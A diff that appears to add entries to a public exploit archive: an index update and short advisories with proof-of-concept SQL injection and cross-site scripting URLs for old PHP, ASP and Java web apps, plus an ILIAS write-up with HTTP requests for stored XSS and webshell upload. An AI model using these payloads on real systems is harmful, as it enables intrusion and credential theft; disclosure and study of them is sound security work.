diff --git a/files.csv b/files.csv
index ab7ed3521..1d512090f 100755
--- a/files.csv
+++ b/files.csv
@@ -28229,6 +28229,7 @@ id,file,description,date,author,platform,type,port
31419,platforms/php/webapps/31419.txt,"TopicsViewer 3.0 Beta 1 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
31420,platforms/php/webapps/31420.txt,"Eventy Online Scheduler 1.8 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
31421,platforms/php/webapps/31421.txt,"Booking Calendar - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
+31423,platforms/windows/webapps/31423.txt,"IBM Business Process Manager - User Account Reconfiguration",2014-02-05,0in,windows,webapps,0
31424,platforms/php/webapps/31424.txt,"Wordpress Dandelion Theme - Arbitry File Upload",2014-02-05,TheBlackMonster,php,webapps,80
31425,platforms/hardware/webapps/31425.txt,"D-Link DIR-100 - Multiple Vulnerabilities",2014-02-05,"Felix Richter",hardware,webapps,80
31426,platforms/php/webapps/31426.txt,"Plogger 1.0 (RC1) - Multiple Vulnerabilities",2014-02-05,killall-9,php,webapps,80
@@ -28550,6 +28551,7 @@ id,file,description,date,author,platform,type,port
31757,platforms/multiple/remote/31757.txt,"ZyWALL 100 HTTP Referer Header Cross Site Scripting Vulnerability",2008-05-08,"Deniz Cevik",multiple,remote,0
31758,platforms/hardware/remote/31758.py,"WRT120N 1.0.0.7 Stack Overflow",2014-02-19,"Craig Heffner",hardware,remote,80
31759,platforms/windows/remote/31759.txt,"Microsoft Internet Explorer 2.0 UTF-7 HTTP Response Handling Weakness",2008-05-08,"Yaniv Miron",windows,remote,0
+31760,platforms/windows/webapps/31760.txt,"Lotus Sametime 8.5.1 - Password Disclosure",2014-02-19,"Adriano Marcio Monteiro",windows,webapps,5081
31762,platforms/windows/dos/31762.py,"Catia V5-6R2013 ""CATV5_AllApplications"" - Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",windows,dos,55555
31763,platforms/windows/dos/31763.py,"SolidWorks Workgroup PDM 2014 SP2 Opcode 2001 - Denial of Service",2014-02-19,"Mohamed Shetta",windows,dos,30000
31764,platforms/hardware/webapps/31764.txt,"Dlink DIR-615 Hardware vE4 Firmware v5.10 - CSRF Vulnerability",2014-02-19,"Dhruv Shah",hardware,webapps,80
@@ -28601,3 +28603,34 @@ id,file,description,date,author,platform,type,port
31811,platforms/asp/webapps/31811.txt,"Site Tanitimlari Scripti Multiple SQL Injection Vulnerabilities",2008-05-20,"fahn zichler",asp,webapps,0
31812,platforms/asp/webapps/31812.txt,"DizaynPlus Nobetci Eczane Takip 1.0 'ayrinti.asp' Parameter SQL Injection Vulnerability",2008-05-20,U238,asp,webapps,0
31813,platforms/php/webapps/31813.txt,"eCMS 0.4.2 Multiple Security Vulnerabilities",2008-05-20,hadihadi,php,webapps,0
+31814,platforms/windows/remote/31814.py,"Mini HTTPD 1.21 - Stack Buffer Overflow POST Exploit",2014-02-22,"OJ Reeves",windows,remote,0
+31815,platforms/linux/dos/31815.html,"libxslt XSL <= 1.1.23 File Processing Buffer Overflow Vulnerability",2008-05-21,"Anthony de Almeida Lopes",linux,dos,0
+31816,platforms/java/webapps/31816.txt,"SAP Web Application Server 7.0 '/sap/bc/gui/sap/its/webgui/' Cross-Site Scripting Vulnerability",2008-05-21,DSecRG,java,webapps,0
+31817,platforms/multiple/dos/31817.html,"Mozilla Firefox 2.0.0.14 JSframe Heap Corruption Denial of Service Vulnerability",2008-05-21,0x000000,multiple,dos,0
+31818,platforms/windows/dos/31818.sh,"vsftpd FTP Server 2.0.5 'deny_file' Option Remote Denial of Service Vulnerability (1)",2008-05-21,"Martin Nagy",windows,dos,0
+31819,platforms/windows/dos/31819.pl,"vsftpd FTP Server 2.0.5 'deny_file' Option Remote Denial of Service Vulnerability (2)",2008-05-21,"Praveen Darshanam",windows,dos,0
+31820,platforms/unix/remote/31820.pl,"IBM Lotus Sametime <= 8.0 Multiplexer Buffer Overflow Vulnerability",2008-05-21,"Manuel Santamarina Suarez",unix,remote,0
+31821,platforms/php/webapps/31821.txt,"phpFreeForum 1.0 rc2 error.php message Parameter XSS",2008-05-22,tan_prathan,php,webapps,0
+31822,platforms/php/webapps/31822.txt,"phpFreeForum 1.0 rc2 part/menu.php Multiple Parameter XSS",2008-05-22,tan_prathan,php,webapps,0
+31823,platforms/php/webapps/31823.txt,"phpSQLiteCMS 1 RC2 cms/includes/header.inc.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0
+31824,platforms/php/webapps/31824.txt,"phpSQLiteCMS 1 RC2 cms/includes/login.inc.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0
+31825,platforms/php/webapps/31825.txt,"BMForum 5.6 index.php outpused Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0
+31826,platforms/php/webapps/31826.txt,"BMForum 5.6 newtem/footer/bsd01footer.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0
+31827,platforms/php/webapps/31827.txt,"BMForum 5.6 newtem/header/bsd01header.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0
+31828,platforms/hardware/remote/31828.txt,"Barracuda Spam Firewall <= 3.5.11 'ldap_test.cgi' Cross-Site Scripting Vulnerability",2008-05-22,"Information Risk Management Plc",hardware,remote,0
+31829,platforms/php/webapps/31829.txt,"AbleDating 2.4 search_results.php keyword Parameter SQL Injection",2008-05-22,"Ali Jasbi",php,webapps,0
+31830,platforms/php/webapps/31830.txt,"AbleDating 2.4 search_results.php keyword Parameter XSS",2008-05-22,"Ali Jasbi",php,webapps,0
+31831,platforms/windows/remote/31831.py,"SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write Vulnerability",2014-02-22,"Mohamed Shetta",windows,remote,30000
+31833,platforms/php/webapps/31833.txt,"ILIAS 4.4.1 - Multiple Vulnerabilities",2014-02-22,HauntIT,php,webapps,80
+31834,platforms/php/webapps/31834.txt,"Wordpress AdRotate Plugin 3.9.4 (clicktracker.php, track param) - SQL Injection",2014-02-22,"High-Tech Bridge SA",php,webapps,80
+31835,platforms/php/webapps/31835.txt,"SAFARI Montage 3.1.3 'forgotPW.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"Omer Singer",php,webapps,0
+31836,platforms/php/webapps/31836.txt,"WordPress Upload File Plugin 'wp-uploadfile.php' SQL Injection Vulnerability",2008-05-24,eserg.ru,php,webapps,0
+31837,platforms/php/webapps/31837.txt,"DZOIC Handshakes 3.5 'fname' Parameter SQL Injection Vulnerability",2008-05-24,"Ali Jasbi",php,webapps,0
+31838,platforms/php/webapps/31838.txt,"Horde Multiple Product workweek.php timestamp Parameter XSS",2008-05-24,"Ivan Sanchez",php,webapps,0
+31839,platforms/php/webapps/31839.txt,"Horde Multiple Product week.php timestamp Parameter XSS",2008-05-24,"Ivan Sanchez",php,webapps,0
+31840,platforms/php/webapps/31840.txt,"Horde Multiple Product day.php timestamp Parameter XSS",2008-05-24,"Ivan Sanchez",php,webapps,0
+31841,platforms/php/webapps/31841.txt,"miniCWB 2.1.1 'connector.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-26,"CWH Underground",php,webapps,0
+31842,platforms/php/webapps/31842.txt,"AbleSpace 1.0 'adv_cat.php' SQL Injection Vulnerability",2008-05-26,Jasbi,php,webapps,0
+31843,platforms/asp/webapps/31843.txt,"Excuse Online 'pwd.asp' SQL Injection Vulnerability",2008-05-26,Unohope,asp,webapps,0
+31844,platforms/php/webapps/31844.txt,"phpFix 2.0 fix/browse.php kind Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
+31845,platforms/php/webapps/31845.txt,"phpFix 2.0 auth/00_pass.php account Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
diff --git a/platforms/asp/webapps/31843.txt b/platforms/asp/webapps/31843.txt
new file mode 100755
index 000000000..2ce0257f5
--- /dev/null
+++ b/platforms/asp/webapps/31843.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/29370/info
+
+Excuse Online is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/excuse/MainProgram/pwd.asp?pwd=blah&pID='+or+???+like+'%25
+http://www.example.com/excuse/MainProgram/pwd.asp?pwd=blah&pID='+or+??+like+'%25
\ No newline at end of file
diff --git a/platforms/hardware/remote/31828.txt b/platforms/hardware/remote/31828.txt
new file mode 100755
index 000000000..339e29d6a
--- /dev/null
+++ b/platforms/hardware/remote/31828.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29340/info
+
+Barracuda Spam Firewall is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Firmware prior to Barracuda Spam Firewall 3.5.11.025 is vulnerable.
+
+https://www.example.com/cgi-bin/ldap_test.cgi?host=127.0.0.1&port=1&tl s_mode=tls_mode&tls_require=&username=&password=&filter=&searchbase=&uni que_attr=&email_attr=&domain=*&email=%3Cscript%3Ealert(document.cookie)% 3C/script%3E
\ No newline at end of file
diff --git a/platforms/java/webapps/31816.txt b/platforms/java/webapps/31816.txt
new file mode 100755
index 000000000..60d08d9a2
--- /dev/null
+++ b/platforms/java/webapps/31816.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29317/info
+
+SAP Web Application Server is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+SAP Web Application Server 7.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/sap/bc/gui/sap/its/webgui/aaaaaaa">
\ No newline at end of file
diff --git a/platforms/linux/dos/31815.html b/platforms/linux/dos/31815.html
new file mode 100755
index 000000000..f6feae71f
--- /dev/null
+++ b/platforms/linux/dos/31815.html
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/29312/info
+
+The 'libxslt' library is prone to a buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data.
+
+An attacker may exploit this issue to execute arbitrary code with the privileges of the user running an application that relies on the affected library. Failed exploit attempts will likely result in denial-of-service conditions.
+
+This issue affects libxslt 1.1.23 and prior versions.
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/platforms/multiple/dos/31817.html b/platforms/multiple/dos/31817.html
new file mode 100755
index 000000000..df31f7b8a
--- /dev/null
+++ b/platforms/multiple/dos/31817.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29318/info
+
+Mozilla Firefox is prone to a remote denial-of-service vulnerability when running certain JavaScript commands on empty applets in an iframe.
+
+Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
+
+This issue affects Firefox 2.0.0.14; other versions may also be vulnerable.
+
+
diff --git a/platforms/php/webapps/31821.txt b/platforms/php/webapps/31821.txt
new file mode 100755
index 000000000..69b8fbbbc
--- /dev/null
+++ b/platforms/php/webapps/31821.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/29337/info
+
+phpFreeForum is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/[phpfreeforum_path]/html/error.php?message=<XSS>
\ No newline at end of file
diff --git a/platforms/php/webapps/31822.txt b/platforms/php/webapps/31822.txt
new file mode 100755
index 000000000..83f981a05
--- /dev/null
+++ b/platforms/php/webapps/31822.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/29337/info
+
+phpFreeForum is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/[phpfreeforum_path]/html/part/menu.php?nickname=
+http://www.example.com/[phpfreeforum_path]/html/part/menu.php?randomid=
\ No newline at end of file
diff --git a/platforms/php/webapps/31823.txt b/platforms/php/webapps/31823.txt
new file mode 100755
index 000000000..9ca3b8c1c
--- /dev/null
+++ b/platforms/php/webapps/31823.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/29338/info
+
+phpSQLiteCMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+phpSQLiteCMS 1 RC2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[home]=
+http://www.example.com/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[admin_menu]=
+http://www.example.com/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[admin_menu_page_overview]=
\ No newline at end of file
diff --git a/platforms/php/webapps/31824.txt b/platforms/php/webapps/31824.txt
new file mode 100755
index 000000000..7206f4d0a
--- /dev/null
+++ b/platforms/php/webapps/31824.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/29338/info
+
+phpSQLiteCMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+phpSQLiteCMS 1 RC2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[phpsqlitecms_path]/cms/includes/login.inc.php?lang[login_username]=
+http://www.example.com/[phpsqlitecms_path]/cms/includes/login.inc.php?lang[login_password]=
+
diff --git a/platforms/php/webapps/31825.txt b/platforms/php/webapps/31825.txt
new file mode 100755
index 000000000..6942e0f93
--- /dev/null
+++ b/platforms/php/webapps/31825.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29339/info
+
+BMForum is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+BMForum 5.6 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[BBForum_path]/index.php?outpused=
\ No newline at end of file
diff --git a/platforms/php/webapps/31826.txt b/platforms/php/webapps/31826.txt
new file mode 100755
index 000000000..a5f0682e9
--- /dev/null
+++ b/platforms/php/webapps/31826.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/29339/info
+
+BMForum is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+BMForum 5.6 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[BBForum_path]/newtem/footer/bsd01footer.php?footer_copyright=
+http://www.example.com/[BBForum_path]/newtem/footer/bsd01footer.php?verandproname=
\ No newline at end of file
diff --git a/platforms/php/webapps/31827.txt b/platforms/php/webapps/31827.txt
new file mode 100755
index 000000000..d6bef5505
--- /dev/null
+++ b/platforms/php/webapps/31827.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/29339/info
+
+BMForum is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+BMForum 5.6 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[BBForum_path]/newtem/header/bsd01header.php?topads=
+http://www.example.com/[BBForum_path]/newtem/header/bsd01header.php?myplugin=
\ No newline at end of file
diff --git a/platforms/php/webapps/31829.txt b/platforms/php/webapps/31829.txt
new file mode 100755
index 000000000..78c583154
--- /dev/null
+++ b/platforms/php/webapps/31829.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/29342/info
+
+AbleDating is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include an SQL-injection vulnerability and a cross-site scripting vulnerability.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, execute arbitrary local scripts, retrieve potentially sensitive information, or exploit latent vulnerabilities in the underlying database.
+
+These issues affect AbleDating 2.4; other versions may also be vulnerable.
+
+
+http://www.example.com/search_results.php?p_age_from=18&p_age_to=18&keyword=[sql injection]&status=online&save_search=on&search_name=My%20search&photo=on&p_orientation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4&search
\ No newline at end of file
diff --git a/platforms/php/webapps/31830.txt b/platforms/php/webapps/31830.txt
new file mode 100755
index 000000000..4725a5943
--- /dev/null
+++ b/platforms/php/webapps/31830.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29342/info
+
+AbleDating is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include an SQL-injection vulnerability and a cross-site scripting vulnerability.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, execute arbitrary local scripts, retrieve potentially sensitive information, or exploit latent vulnerabilities in the underlying database.
+
+These issues affect AbleDating 2.4; other versions may also be vulnerable.
+
+http://www.example.com/search_results.php?p_orientation%5B%5D=2&p_age_from=18&p_age_to=18&p_relation%5B%5D=on&keyword=>'>&status=online&save_search=on&search_name=My%20search&photo=on
\ No newline at end of file
diff --git a/platforms/php/webapps/31833.txt b/platforms/php/webapps/31833.txt
new file mode 100755
index 000000000..17fb5663a
--- /dev/null
+++ b/platforms/php/webapps/31833.txt
@@ -0,0 +1,171 @@
+# ==============================================================
+# Title ...| Multiple vulnerabilities in ILIAS
+# Version .| ilias-4.4.1.zip
+# Date ....| 21.02.2014
+# Found ...| HauntIT Blog
+# Home ....| www.ilias.de
+# ==============================================================
+
+First from admin user logged in:
+
+# ==============================================================
+# 1. Persistent xss
+
+------
+
+POST /k/cms/ilias/ilias.php?wsp_id=2&cmd=post&cmdClass=ilobjbloggui&cmdNode=mw:my:ma&baseClass=
+ilPersonalDesktopGUI&fallbackCmd=createPosting&rtoken=6bac7751a71721f25adb9e579dea4344 HTTP/1.1
+Host: 10.149.14.62
+(...)
+Content-Length: 91
+
+title=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&cmd%5BcreatePosting%5D=Add+Posting
+------
+
+
+# ==============================================================
+# 2. Possibility of uploading webshell
+
+Uploaded file can be found in the ILIAS directories, for example:
+------
+k@lab:~/public_html/cms/ilias$ cat ./44444/ilFile/3/file_334/001/shell.php
+
+k@lab:~/public_html/cms/ilias$
+------
+
+Direct access to this file will give you a webshell.
+
+*
+* This bug will be described later in section for 'normal/registered' user.
+*
+
+
+# ==============================================================
+# 3. XSS
+
+------
+POST /k/cms/ilias/ilias.php?ref_id=1&new_type=webr&cmd=post&cmdClass=ilobjlinkresourcegui&
+cmdNode=nm:9y&baseClass=ilRepositoryGUI&rtoken=6bac7751a71721f25adb9e579dea4344 HTTP/1.1
+Host: 10.149.14.62
+(...)
+Content-Length: 760
+
+tar_mode=ext&tar='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&tar_val=%3Cdiv+id%3D%22tar_value
+%22%3E%0D%0A%09%0D%0A%3C%2Fdiv%3E%09%0D%0A%3Cdiv+class%3D%22small%22%3E%0D%0A%09%3Ca+id%3D%
+22tar_ajax%22+class%3D%22iosEditInternalLinkTrigger%22+href%3D%22ilias.php%3Fref_id%3D1%26n
+ew_type%3Dwebr%26postvar%3Dtar%26cmdClass%3Dilinternallinkgui%26cmdNode%3Dnm%3A9y%3A3l%3A3z
+%3A3s%3Ai1%26baseClass%3DilRepositoryGUI%26cmdMode%3Dasynch%22%3E%26raquo%3B+Select+Target+
+Object%3C%2Fa%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3Cdiv+class%3D%22small++ilNoDisplay%22+id%3D%22tar
+_rem%22%3E%0D%0A%09%3Ca+class%3D%22ilLinkInputRemove%22+href%3D%22%23%22%3E%26raquo%3B+Remo
+ve%3C%2Fa%3E%0D%0A%3C%2Fdiv%3E&tar_ajax_type=&tar_ajax_id=&tar_ajax_target=&tit=asdasd&des=
+asdasd&cmd%5Bsave%5D=Add+Weblink
+
+------
+
+------
+
+Target: *
+
+" size="40"
+maxlength="500" />
+
+------
+
+
+
+
+# ==============================================================
+# 4. Another webshell upload possibility
+
+There is a possibility of creating webshell when php file is added as an attachement
+to email to user(s).
+
+
+All shells will be located in /ilias/ (wwwroot) directory with value from 'client_id'
+(for example: client_id=44444, then your shell is in /ilias/44444/...)
+
+
+
+# ==============================================================
+
+Second: from normal/registered user logged in:
+
+# ==============================================================
+# 1. When normal user is registered on the latest ILIAS, he is able to add
+PHP file contains simple shell. From this moment he will be able to hack
+the whole server.
+
+------
+POST /k/cms/ilias/ilias.php?wsp_id=41&new_type=file&cmd=post&cmdClass=
+ilobjfilegui&cmdNode=mw:my:jh&baseClass=ilPersonalDesktopGUI&fallbackC
+md=uploadFiles&rtoken=2e4e8af720b2204ea51503ca6388a325 HTTP/1.1
+Host: 10.149.14.62
+(...)
+Cache-Control: no-cache
+
+-----------------------------1761332042190
+Content-Disposition: form-data; name="title"
+
+shell.php
+-----------------------------1761332042190
+Content-Disposition: form-data; name="description"
+
+
+-----------------------------1761332042190
+Content-Disposition: form-data; name="extract"
+
+0
+-----------------------------1761332042190
+Content-Disposition: form-data; name="keep_structure"
+
+0
+-----------------------------1761332042190
+Content-Disposition: form-data; name="upload_files"; filename="shell.php"
+Content-Type: application/octet-stream
+
+
+-----------------------------1761332042190--
+
+------
+
+
+# ==============================================================
+# 2. XSS (same place like when admin is logged in)
+
+
+------
+POST /k/cms/ilias/ilias.php?wsp_id=41&new_type=webr&cmd=post&cmdClass=ilobjlinkresource
+gui&cmdNode=mw:my:9y&baseClass=ilPersonalDesktopGUI&rtoken=1561f316d721f9683b0ae5f0b652db25 HTTP/1.1
+Host: 10.149.14.62
+(...)
+Content-Length: 768
+
+tar_mode=ext&tar='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&tar_val=%3Cdiv+id%3D%22
+tar_value%22%3E%0D%0A%09%0D%0A%3C%2Fdiv%3E%09%0D%0A%3Cdiv+class%3D%22small%22%3E%0
+D%0A%09%3Ca+id%3D%22tar_ajax%22+class%3D%22iosEditInternalLinkTrigger%22+href%3D%2
+2ilias.php%3Fwsp_id%3D41%26new_type%3Dwebr%26postvar%3Dtar%26cmdClass%3Dilinternal
+linkgui%26cmdNode%3Dmw%3Amy%3A9y%3A3l%3A3z%3A3s%3Ai1%26baseClass%3DilPersonalDeskt
+opGUI%26cmdMode%3Dasynch%22%3E%26raquo%3B+Select+Target+Object%3C%2Fa%3E%0D%0A%3C%
+2Fdiv%3E%0D%0A%3Cdiv+class%3D%22small++ilNoDisplay%22+id%3D%22tar_rem%22%3E%0D%0A%
+09%3Ca+class%3D%22ilLinkInputRemove%22+href%3D%22%23%22%3E%26raquo%3B+Remove%3C%2F
+a%3E%0D%0A%3C%2Fdiv%3E&tar_ajax_type=&tar_ajax_id=&tar_ajax_target=&tit=asdasd&des
+=dsa&cmd%5Bsave%5D=Add+Weblink
+------
+
+
+
+# ==============================================================
+# 3. Persistent xss
+
+------
+POST /k/cms/ilias/ilias.php?wsp_id=111&bmn=2014-02&cmd=post&cmdClass=ilobjbloggui&cmdNode=mw:my:ma&baseClass=ilPersonalDesktopGUI&fallbackCmd=createPosting&rtoken=1561f316d721f9683b0ae5f0b652db25 HTTP/1.1
+Host: 10.149.14.62
+(...)
+Content-Length: 89
+
+title=%27%3E%22%3E%3Cbody%2Fonload%3Dalert%28123%29%3E&cmd%5BcreatePosting%5D=Add+Posting
+------
+
+
+# ==============================================================
+# More @ http://HauntIT.blogspot.com
\ No newline at end of file
diff --git a/platforms/php/webapps/31834.txt b/platforms/php/webapps/31834.txt
new file mode 100755
index 000000000..4e019a012
--- /dev/null
+++ b/platforms/php/webapps/31834.txt
@@ -0,0 +1,60 @@
+Advisory ID: HTB23201
+Product: AdRotate
+Vendor: AJdG Solutions
+Vulnerable Version(s): 3.9.4 and probably prior
+Tested Version: 3.9.4
+Advisory Publication: January 30, 2014 [without technical details]
+Vendor Notification: January 30, 2014
+Vendor Patch: January 31, 2014
+Public Disclosure: February 20, 2014
+Vulnerability Type: SQL Injection [CWE-89]
+CVE Reference: CVE-2014-1854
+Risk Level: High
+CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
+Solution Status: Fixed by Vendor
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
+
+-----------------------------------------------------------------------------------------------
+
+Advisory Details:
+
+High-Tech Bridge Security Research Lab discovered vulnerability in AdRotate, which can be exploited to perform SQL Injection attacks.
+
+
+1) SQL Injection in AdRotate: CVE-2014-1854
+
+The vulnerability exists due to insufficient validation of "track" HTTP GET parameter passed to
+ "/wp-content/plugins/adrotate/library/clicktracker.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.
+
+The following PoC code contains a base64-encoded string "-1 UNION SELECT version(),1,1,1", which will be injected into SQL query and will output MySQL server version:
+
+http://[host]/wp-content/plugins/adrotate/library/clicktracker.php?track=LTEgVU5JT04gU0VMRUNUIHZlcnNpb24oKSwxLDEsMQ==
+
+Successful exploitation will result in redirection to local URI that contains version of the MySQL server:
+http://[host]/wp-content/plugins/adrotate/library/5.1.71-community-log
+
+
+-----------------------------------------------------------------------------------------------
+
+Solution:
+
+Update to AdRotate 3.9.5
+
+More Information:
+http://www.adrotateplugin.com/2014/01/adrotate-pro-3-9-6-and-adrotate-free-3-9-5/
+http://wordpress.org/plugins/adrotate/changelog/
+http://www.adrotateplugin.com/development/
+
+-----------------------------------------------------------------------------------------------
+
+References:
+
+[1] High-Tech Bridge Advisory HTB23201 - https://www.htbridge.com/advisory/HTB23201 - SQL Injection in AdRotate.
+[2] AdRotate - http://wordpress.org/plugins/adrotate/ - AdRotate for WordPress.
+[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
+[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
+[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
+
+-----------------------------------------------------------------------------------------------
+
+Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
\ No newline at end of file
diff --git a/platforms/php/webapps/31835.txt b/platforms/php/webapps/31835.txt
new file mode 100755
index 000000000..8d10b8b7f
--- /dev/null
+++ b/platforms/php/webapps/31835.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29343/info
+
+SAFARI Montage is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+SAFARI Montage 3.1.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/SAFARI/montage/forgotPW.php?school="> http://www.example.com/SAFARI/montage/forgotPW.php?email=">